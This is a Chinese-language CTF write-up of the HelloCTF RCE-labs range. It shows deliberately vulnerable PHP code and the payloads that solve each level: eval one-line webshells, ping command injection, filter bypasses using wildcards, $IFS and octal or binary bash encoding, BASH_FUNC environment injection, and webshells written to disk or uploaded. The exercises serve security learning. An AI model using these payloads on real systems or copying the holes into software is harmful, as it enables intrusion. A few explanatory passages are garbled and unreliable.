RCE靶场学习

(Updated: )

RCELABS-1

1
2
3
4
5
6
7
8
9
10
11
12
13
$code = "include('flag.php');echo 'This will get the flag by eval PHP code: '.\$flag;";

$bash = "echo 'This will get the flag by Linux bash command - cat /flag: ';cat /flag";

eval($code);

echo "<br>";

system($bash);

highlight_file(__FILE__);

?>

RCE靶场第一题

在这里将code字符包含了flag.php文件 并且bash命令字符串会打印这串提示信息并且尝试实行命令查看/flag文件的内容 eval()会将包含的内容当作PHP代码来执行 system()会执行包含的系统命令,即bash命令,然后将会读取flag

RCELABS-2

1
2
3
4
5
eval($_POST['a']);

highlight_file(__FILE__);

?>

这里是个标准的一句话木马的题目 eval会执行传入的post参数a所包含的命令,所以我们可以通过传入a的特定值来执行恶意代码

1
a=system('cat/flag');

然后就可以读取到flag

RCELABS-3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
function hello_ctf($function, $content){
    global $flag;
    $code = $function . "(" . $content . ");";
    echo "Your Code: $code <br>";
    eval($code);
}
function get_fun(){
    $func_list = ['eval','assert','call_user_func','create_function','array_map','call_user_func_array','usort','array_filter','array_reduce','preg_replace'];
    if (!isset($_SESSION['random_func'])) {
        $_SESSION['random_func'] = $func_list[array_rand($func_list)];
    }
    
    $random_func = $_SESSION['random_func'];
    $url_fucn = preg_replace('/_/', '-', $_SESSION['random_func']);   
    echo "获得新的函数: $random_func ,去 https://www.php.net/manual/zh/function.".$url_fucn.".php 查看函数详情。<br>";

    return $_SESSION['random_func'];
}
function start($act){
    $random_func = get_fun();    
    if($act == "r"){ /* 通过发送GET ?action=r 的方式可以重置当前选中的函数 —— 或者你可以自己想办法可控它x */
        session_unset();
        session_destroy(); 
    }
    if ($act == "submit"){
        $user_content = $_POST['content']; 
        hello_ctf($random_func, $user_content);
    }
}

isset($_GET['action']) ? start($_GET['action']) : '';
highlight_file(__FILE__);

?>

get_fun()函数中

每次随机从 $func_list[]这个列表中读取一个参数并将其存入session中,然后返回这个函数名

start()函数中

首先执行get_fun()函数获得$func_list[]列表内的一个参数 然后判断get参数action是否为r,如果是,执行session_unset()函数,清空session变量然后重新用get_fun()函数获取一个参数。 然后判断get参数action是否为submit,如果是,则接受提交的post参数content并执行。

hello_ctf()函数会调用所有的函数,将选定的函数和输入的内容当成PHP代码并且使用eval()执行

$func_list[]中的函数分析

1
2
3
4
5
6
7
8
9
10
$func_list = ['eval','assert','call_user_func','create_function','array_map','call_user_func_array','usort','array_filter','array_reduce','preg_replace'];
/*eval()执行一个字符串为PHP代码;
assert()判断是否为字符串,如果是字符串,将当作PHP代码并且用eval()执行
call_user_func()用于调用回调参数,第一个参数作为调用的函数,第二个为函数的变量数据
create_function()从传递的参数中创建动态参数,并返回它的唯一值
array_map()第一个参数调用一个函数然后调用一个数组,返回唯一值
call_user_func_array()将第一个参数调用为函数,将参数数组作为变量传入函数
usort()判断两个值是否相等,相等返回原数值
array_reduce()将将数组中的每个值放入函数中进行迭代,最后计算为单一值
preg_replace()将传入的的字符串或者数组进行完全替换

用?action=r获得一个函数,然后构造相应的payload

1
2
3
4
5
6
7
8
9
10
11
eval('${flag}');
eval('echo $flag;');
assert(print_r($flag));
call_user_func('print_r', $flag);
create_function('$a', 'echo $flag;')($a);
array_map(print_r($flag), $a);
call_user_func_array(print_r($flag), array());
usort($a,print_r($flag));
array_filter($a,print_r($flag));
array_reduce($a,print_r($flag));
preg_replace('/(.*)/ei', 'strtolower("\\1")', ${print_r($flag)});

然后我们就可以得到类似于

1
Your Code: array_reduce(assert(print_r($flag)));

此时我们只需要构造相应的post参数content就可以读取flag。

RCELABS-4

1
2
3
4
5
6
system($_POST['a']);

highlight_file(__FILE__);


?>

没什么好说的,这里用的是system命令 system() 函数会通过sh软连接执行你输入的系统命令。 所以我们构造payload传入a让它读取flag即可

1
a=cat /flag//不知道为啥这里不加空格无法执行

RCELABS-5

1
2
3
4
5
6
7
8
9
10
function hello_server($ip){
    system("ping -c 1 $ip");
}

isset($_GET['ip']) ? hello_server($_GET['ip']) : null;

highlight_file(__FILE__);


?>

这里的漏洞函数为

1
2
3
function hello_server($ip){
    system("ping -c 1 $ip");
}

这里它会执行用户输入的ip地址检测是否能ping通 但是没有严格的过滤,所以我们可以传入任意指令

考察的是shell的基本运算符

1
2
3
4
&&: and操作 只有当第一个命令 cmd_1 执行成功(返回值为 0)时,才会执行第二个命令 cmd_2
||  or操作 只有当第一个命令 cmd_1 执行失败(返回值不为 0)时,才会执行第二个命令 cmd_2
&   将命令 cmd_1 放到后台执行,Shell 立即执行 cmd_2,两个命令并行执行。
;   无论前一个命令 cmd_1 是否成功,都会执行下一个命令 cmd_2。

所以我们只需要通过shell的基本运算符来拼接我们需要传入的命令即可

1
2
3
4
?ip=1.1.1.1&&cat /flag//成功载入公共免费的DNS服务器然后执行cat获得flag的命令
?ip=||cat /flag//令ip无法ping通然后获得flag
?ip=;cat /flag//无所谓第一条命令是啥都会执行第二条命令
?ip=&cat /flag  # &需要URL编码 将命令1和命令2同时执行

RCELABS-6

1
2
3
4
5
6
7
8
9
10
11
12
13
function hello_shell($cmd){
    if(preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

这关考察的是通配符的使用

通配符及其用法

通配符 功能说明 示例 用途
* 匹配零个或多个字符 *.txt 匹配所有以 .txt 结尾的文件
? 匹配单个字符 file?.txt 匹配 file1.txtfile2.txt 等单个字符的文件名
[ ] 匹配方括号内的任意一个字符 file[1-3].txt 匹配 file1.txtfile2.txtfile3.txt
[^ ] 匹配不在方括号内的字符 file[^a-c].txt 匹配不包含 a 到 c 之间字符的文件
{ } 匹配大括号内的任意一个字符,使用逗号分隔 file{1,2,3}.txt 匹配 file1.txtfile2.txtfile3.txt
~ 表示当前用户的主目录 ~/Documents 访问主目录下的 Documents 文件夹
! 表示取反,在某些条件测试或模式匹配中使用 ls !( *.txt ) 列出所有不是 .txt 结尾的文件
\ 转义字符,取消通配符的特殊意义 file\*.txt 匹配文件名为 file*.txt 的文件

解决

观察此处的正则过滤了

1
preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/", $cmd)

所以能用的只有一个字母 a 和数字

而此时我们通过了解通配符,可以发现用?可以逐渐匹配各个字符

1
2
/?cmd=/???/?a? /??a? 
#这个命令会匹配到/bin/cat /flag,接着找flag就好了

或者说

1
2
?cmd=/???/?a??64 /??a?
    //匹配到/bin/base64 /flag,将/flag进行base64编码后输出

RCELABS-7

1
2
3
4
5
6
7
8
9
10
11
12
13
function hello_shell($cmd){
    if(preg_match("/flag| /", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

过滤了flag和空格,所以只需要绕过空格和flag即可

1
2
3
?cmd=cat${IFS}/fl""ag#空格被视为一个命令分隔符,本质上由 $IFS 变量控制,直接键入 $IFS 来绕过空格过滤。
?cmd=cat$IFS/fl""ag
?cmd=cat%09/fl""ag#空格的url绕过

RCELABS-8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
--- HelloCTF - RCE靶场 : 命令执行 - 重定向 --- 

大多数 UNIX 系统命令从你的终端接受输入并将所产生的输出发送回​​到您的终端。一个命令通常从一个叫标准输入的地方读取输入,默认情况下,这恰好是你的终端。同样,一个命令通常将其输出写入到标准输出,默认情况下,这也是你的终端 —— 这些是命令有回显的基础。

如果希望执行某个命令,但又不希望在屏幕上显示输出结果,那么可以将输出重定向到 /dev/null:
$ command > /dev/null

/dev/null 是一个特殊的文件,写入到它的内容都会被丢弃;如果尝试从该文件读取内容,那么什么也读不到。但是 /dev/null 文件非常有用,将命令的输出重定向到它,会起到"禁止输出"的效果。
如果希望屏蔽 stdout 和 stderr,可以这样写:
$ command > /dev/null 2>&1

*/

function hello_shell($cmd){
    /*>/dev/null 将不会有任何回显,但会回显错误,加上 2>&1 后连错误也会被屏蔽掉*/
    system($cmd.">/dev/null 2>&1");
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

关键函数在于

1
system($cmd.">/dev/null 2>&1");

这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示出来

所以我们直接用命令分隔符分开就行了

1
/?cmd=cat /flag;

这个payload会先打印 /flag 文件内容,然后再执行其标准输出和标准错误输出都重定向到 /dev/null,但是flag会先输出出来所以重定向不影响打印结果。

RCELABS-9

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php 
/*

--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_八进制转义 ---

题目已经拥有成熟脚本:https://github.com/ProbiusOfficial/bashFuck
你也可以使用在线生成:https://probiusofficial.github.io/bashFuck/
题目本身也提供一个/exp.php方便你使用

从该关卡开始你会发现我们在Dockerfile中添加了一行改动:

RUN ln -sf /bin/bash /bin/sh

这是由于在PHP中,system是执行sh的,sh通常只是一个软连接,并不是真的有一个shell叫sh。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash,我们用的底层镜像 php:7.3-fpm-alpine 默认指向的 /bin/busybox ,要验证这一点,你可以对 /bin/sh 使用 ls -l 命令查看,在这个容器中,你会得到下面的回显:
bash-5.1# ls -l /bin/sh
lrwxrwxrwx    1 root     root            12 Mar 16  2022 /bin/sh -> /bin/busybox

我们需要用到的特性只有bash才支持,请记住这一点,这也是我们手动修改指向的原因。

在这个关卡主要利用的是在终端中,$'\xxx'可以将八进制ascii码解析为字符,仅基于这个特性,我们可以将传入的命令的每一个字符转换为$'\xxx\xxx\xxx\xxx'的形式,但是注意,这种方式在没有空格的情况下无法执行带参数的命令。
比如"ls -l"也就是$'\154\163\40\55\154' 只能拆分为$'\154\163' 空格 $'\55\154'三部分。

bash-5.1# $'\154\163\40\55\154'
bash: ls -l: command not found

bash-5.1# $'\154\163' $'\55\154'
total 4
-rw-r--r--    1 www-data www-data       829 Aug 14 19:39 index.php

*/

function hello_shell($cmd){
    if(preg_match("/[A-Za-z\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

本题中禁用了字母和符号,只有数字可以用

上边赛题提示,已经将 /bin/sh 设置为指向 /bin/bash 的符号链接。换句话说,运行 /bin/sh 时,实际上会调用 /bin/bash

接下来就是bash的8进制绕过

为了方便做题,特地提示我们:

  1. 即使是八进制,同样需要空格
  2. 提供了一个BashFuck工具在exp.php中
1
/?cmd=$'\143\141\164' $'\57\146\154\141\147'

RCELABS-10

1
2
3
4
5
6
7
8
9
10
11
12
13
function hello_shell($cmd){
    if(preg_match("/[A-Za-z2-9\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

本题ban把2-9的数字都ban掉了,只能用010执行

需要的payload

1
cat /flag;

在线工具生成

1
$0<<<$0\<\<\<\$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\'

但是执行得不到结果,查询了解后知道

1
在 URL 中,# 表示锚点(Anchor),它用于指向网页中的特定位置或片段。锚点的主要功能是让浏览器快速定位到页面内的某个部分

所以#在这里被锚点了,所以需要进行编码

1
$0<<<$0\<\<\<\$\'\\$(($((1<<1))%2310001111))\\$(($((1<<1))%2310001101))\\$(($((1<<1))%2310100100))\\$(($((1<<1))%23101000))\\$(($((1<<1))%23111001))\\$(($((1<<1))%2310010010))\\$(($((1<<1))%2310011010))\\$(($((1<<1))%2310001101))\\$(($((1<<1))%2310010011))\'

一个字符代表一个编码,所以需要有9个%23

RCELABS-11

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php 
/*
# -*- coding: utf-8 -*-
# @Author: 探姬
# @Date:   2024-08-11 14:34
# @Repo:   github.com/ProbiusOfficial/RCE-labs
# @email:  admin@hello-ctf.com
# @link:   hello-ctf.com

--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_数字1的特殊变量替换 --- 

题目已经拥有成熟脚本:https://github.com/ProbiusOfficial/bashFuck
你也可以使用在线生成:https://probiusofficial.github.io/bashFuck/
题目本身也提供一个/exp.php方便你使用

本关卡的考点为终端中支持 $((2#binary)) 解析二进制数据 + 我们用 ${##} 来替换 1 

*/

function hello_shell($cmd){
    if(preg_match("/[A-Za-z1-9\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_POST['cmd']) ? hello_shell($_POST['cmd']) : null;

highlight_file(__FILE__);


?>

在上一题的升级版,把1也禁掉了

题目也提示了用 $ 来替换 1

关于##

变量 含义 示例输出
$这个点特性来解决问题了

${!xxx},它表示用 xxx 的值作为另一个变量的名字,然后取出那个变量的值。

1
2
3
4
5
6
7
8
如果a=0,b=1,c=2,那么 ${!a} 就相当于 $0${!b} 就相当于 $1${!c} 就相当于 $2 
$ echo $#
0
111@DESKTOP-U8DE9QD MINGW64 ~/Desktop
$ a=0
111@DESKTOP-U8DE9QD MINGW64 ~/Desktop
$ echo ${!a}
/usr/bin/bash#不知道为啥我的bash终端好像调试不太行,后续再看看什么情况

所以我们可以构造payload

1
${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\\$(($((${##}<<${##}))#${##}${##}${#}${#}))\'

RCELABS-13

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php 
/*
# -*- coding: utf-8 -*-
# @Author: 探姬
# @Date:   2024-08-11 14:34
# @Repo:   github.com/ProbiusOfficial/RCE-labs
# @email:  admin@hello-ctf.com
# @link:   hello-ctf.com

--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_特殊扩展替换任意数字 --- 

题目已经拥有成熟脚本:https://github.com/ProbiusOfficial/bashFuck
你也可以使用在线生成:https://probiusofficial.github.io/bashFuck/
题目本身也提供一个/exp.php方便你使用

本关卡的考点为 $(()) + 取反 构造任意数字

echo $(()) -> 0
echo $((~$(()))) -> -1
echo $(($((~$(())))$((~$(()))))) -> -2

*/

function hello_shell($cmd){
    if(preg_match("/[A-Za-z0-9\"%*+,-.\/:;>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

算术扩展$(())

在bash中,$(())用于执行算术扩展。

1
2
$ echo $(())
0

按位非 ~

~ 运算符执行按位非(补码)操作。对于任何整数 x~x 等价于 -(x + 1)

1
2
$ echo $((~$(())))
-1

最内部的 $(()): 这求值为 0~$(()) 变为 ~0: 现在我们对 0 执行按位非操作,在二进制补码中,~0-(0 + 1),即 -1$((~0)) 变为 ((-1)): 算术扩展求值 -1

并且有

1
2
3
$ echo $(($((~$(())))$((~$(())))))
-2

按照上述描述左右各生成了一个-1 所以此时我们有{-1}${-1}

而根据$(())的特性,Bash 会尝试将连接后的字符串解释为单个算术表达式。

在这个特定的例子中,$(( ($((~$(()))) )$((~$(()))) ) )) 简化为 $((-1 -1))。Bash 将这视为 (-1)(-1) 的连接,形成了字符串 "-1-1"

然后,$(("-1-1")) 被作为算术表达式求值。Bash 将 "-1-1" 解析为-2。

所以我们通过这个方法构造得到任意数字

1
2
3
4
5
6
7
8
9
10
oct_list = [  # 构造数字 0-7 以便于后续八进制形式的构造
    '$(())',  # 0
    '$((~$(($((~$(())))$((~$(())))))))',  # 1
    '$((~$(($((~$(())))$((~$(())))$((~$(())))))))',  # 2
    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 3
    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 4
    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 5
    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 6
    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 7
]

所以我们在这题中所需的payload就是

1
2
__=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'

但是直接输会被waf掉,套个url编码即可

1
?cmd=%5f%5f%3d%24%28%28%29%29%26%26%24%7b%21%5f%5f%7d%3c%3c%3c%24%7b%21%5f%5f%7d%5c%3c%5c%3c%5c%3c%5c%24%5c%27%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%27

RCELABS-14

1
2
3
4
5
6
7
8
9
10
11
12
if(strlen($_GET[1]<8)){
    echo strlen($_GET[1]);
    echo '<hr/>';
    echo shell_exec($_GET[1]);
}else{
    exit('too long');
}

highlight_file(__FILE__);


?>

限制7字符长度的RCE

首先用?1=ls;找flag的目录 只有index,php,明显不在当前内 换用ls / 找到了flag在这个目录下 用head /f* 读取拿到flag

RCELABS-15

1
2
3
4
5
6
7
8
9
10
11
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
    @exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);

?>

五字符RCE

RCELABS-16

1
2
3
4
5
6
7
8
9
10
11
12
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
    @exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf ' . $sandbox);
}

highlight_file(__FILE__);

?>

三字符RCE

RCELABS-17

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
function hello_ctf($function, $content){
    if($function == '``'){
        $code = '`'.$content.'`';
        echo "Your Code: $code <br>";
        eval("echo $code");
    }else
    {
        $code = $function . "(" . $content . ");";
        echo "Your Code: $code <br>";
        eval($code);
    } 
    
}
function get_fun(){

    $func_list = ['system', 'exec', 'shell_exec', 'passthru', 'popen','``'];

    if (!isset($_SESSION['random_func'])) {
        $_SESSION['random_func'] = $func_list[array_rand($func_list)];
    }
    
    $random_func = $_SESSION['random_func'];

    $url_fucn = preg_replace('/_/', '-', $_SESSION['random_func']);

    echo $random_func == '``' ? "获得隐藏运算符: 执行运算符 ,去 https://www.php.net/manual/zh/language.operators.execution.php 详情。<br>" : "获得新的函数: $random_func ,去 https://www.php.net/manual/zh/function.".$url_fucn.".php 查看函数详情。<br>";

    return $_SESSION['random_func'];
}

function start($act){

    $random_func = get_fun();
    
    if($act == "r"){ /* 通过发送GET ?action=r 的方式可以重置当前选中的函数 —— 或者你可以自己想办法可控它x */
        session_unset();
        session_destroy(); 
    }

    if ($act == "submit"){
        $user_content = $_POST['content']; 
        hello_ctf($random_func, $user_content);
    }
}

isset($_GET['action']) ? start($_GET['action']) : '';

highlight_file(__FILE__);

?>

passthru

1
post:content='cat /flag'

system

1
content='cat /flag'

exec

1
content='cat /flag >a'#重定向到a 然后访问a

执行运算符 反引号

1
content='cat /flag >a'

popen

popen() 函数执行系统命令,返回一个资源类型的变量,配合 fread() 函数读取结果。

1
content='cat /flag','r'); handle = popen('cat /flag','r'); echofread(handle, 100)

shell_exec 依旧重定向

1
content='cat /flag >a'

RCELABS-18

1
2
3
4
5
6
7
8
9
foreach($_REQUEST['envs'] as $key => $val) {
    putenv("{$key}={$val}");
}

system('echo hello');

highlight_file(__FILE__);

?>

环境变量注入

构造

1
envs[BASH_FUNC_echo%%]=() { cat /flag; }

用BASH_FUNC_XXX%%去执行echo这个函数,这个函数的内容是{ cat /flag;}

RCELABS-19

1
2
3
4
5
6
7
8
9
10
function helloctf($code){
    $code = "file_put_contents(".$code.");";
    eval($code);
}

isset($_GET['c']) ? helloctf($_GET['c']) : '';

highlight_file(__FILE__);

?>

文件写入导致的rce

file_put_contents()这个函数可以完成任意文件写入内容,所以我们可以构造一句话木马

1
?c='shell.php','<?php system($_GET["cmd"]); ?>'

此时已经写入了木马,然后我们在访问shell这个文件来执行系统命令

1
/shell.php?cmd=cat /flag

读到了flag

RCELABS-20

文件上传RCE

直接上传一个一句话木马

1
<?php @eval($_POST['cmd']); ?>

